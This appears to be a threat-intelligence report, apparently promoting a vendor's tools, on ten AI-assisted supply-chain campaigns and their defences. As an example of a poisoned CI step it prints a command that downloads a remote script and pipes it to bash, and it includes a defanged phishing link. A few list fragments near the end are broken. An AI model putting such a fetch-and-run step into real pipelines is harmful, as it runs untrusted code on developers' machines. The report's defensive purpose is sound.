Executive Summary: Between Q4 2025 and Q1 2026, supply-chain attacks escalated 340% year-over-year, driven by asymmetric AI-generated codebases that exploit trust in automated toolchains. Attackers weaponized open-source repositories, CI/CD pipelines, and LLM-powered dev tools to inject malicious dependencies with benign-seeming AI-generated artifacts. This report analyzes the Top 10 campaigns, their TTPs (Tactics, Techniques, and Procedures), and the countermeasures required to mitigate future AI-augmented threats.
In November 2025, a campaign dubbed “PolyCode” infected 2,300+ repositories with AI-generated Python packages (e.g., numpy-ai, pandas-ml). Attackers used LLMs to generate statistically plausible code snippets embedding reverse shells. These packages passed initial static analysis due to AI-optimized obfuscation (e.g., variable renaming, control-flow flattening). The attack vector exploited the lack of AI-aware SBOM validation in CI/CD pipelines.
The “CICD-AI” campaign (December 2025) targeted Jenkins and GitHub Actions workflows. Attackers used LLMs to generate benign-looking patch files (e.g., fix-security-vulnerability.patch) that introduced backdoors. The patches were AI-optimized to match project style, reducing suspicion. This technique bypassed traditional patch validation by exploiting developer trust in AI-generated fixes.
In January 2026, the “RepoMimic” attack compromised 5,000+ GitHub repositories by injecting AI-generated READMEs, documentation, and code samples. The AI mimicked the style of trusted maintainers, embedding hidden exploit instructions in documentation. Users who cloned repositories unknowingly executed malicious scripts during setup.
The “PackageBlend” attack (February 2026) used AI to generate polymorphic JavaScript and Python packages. Each installation produced a unique obfuscated payload, evading signature-based detection. The AI optimized payload delivery based on runtime environment (e.g., Docker vs. bare metal).
In March 2026, the “IDE-AI” campaign distributed malicious VS Code and JetBrains plugins via AI-generated marketplace listings. The plugins included AI-optimized autocomplete snippets that delivered ransomware payloads when activated. The AI ensured the snippets matched project context, reducing detection likelihood.
The “TemplateHijack” attack (Q4 2025) compromised GitHub Actions and GitLab CI templates. Attackers used LLMs to generate CI templates with AI-optimized malicious steps (e.g., run: curl http://malicious[.]com/install.sh | bash). The templates were distributed via AI-generated “optimization” suggestions in dev forums.
Building on the 2020 dependency confusion attack, the “AI-Confusion” campaign (January 2026) used AI to generate plausible internal package names (e.g., @company/internal-utils). The AI mimicked the organization’s naming conventions, tricking developers into installing malicious replacements from public repositories.
In February 2026, the “FalseFlag” attack used AI to generate code that intentionally triggered false positives in SAST/DAST tools. This forced security teams to whitelist benign AI-generated artifacts, creating gaps for malicious payloads to slip through.
The “ConvinceAI” campaign (March 2026) used LLMs to craft convincing phishing emails and Slack messages targeting developers. The AI personalized messages based on repository activity, increasing click-through rates for malicious AI-generated links (e.g., https://fix-bug[.]ai).
The “SBOM-AI” arms race saw attackers use LLMs to generate fake SBOMs that matched AI-generated codebases. Defenders countered with AI-driven SBOM validation, but attackers deployed adversarial LLMs to mimic benign SBOM outputs, creating a cat-and-mouse dynamic.
sbom-ai-validator).PolyShield).AI-Threat-Share).Q1: How can organizations detect AI-generated malicious dependencies?
Use AI-aware SBOM tools that cross-reference AI-generated artifacts with ground-truth repositories and historical patterns. Deploy runtime behavioral analysis to detect polymorphic payloads. Oracle-42’s PolyShield and sbom-ai-validator are designed for this purpose.
Q2: What is the most effective defense against AI-generated CI/CD attacks?
The most effective defense is a trust-but-verify model for CI/CD. Validate all AI-generated patches and dependencies in isolated sandboxes before merging into production. Implement deny-by-default policies for AI-generated artifacts in critical paths.
<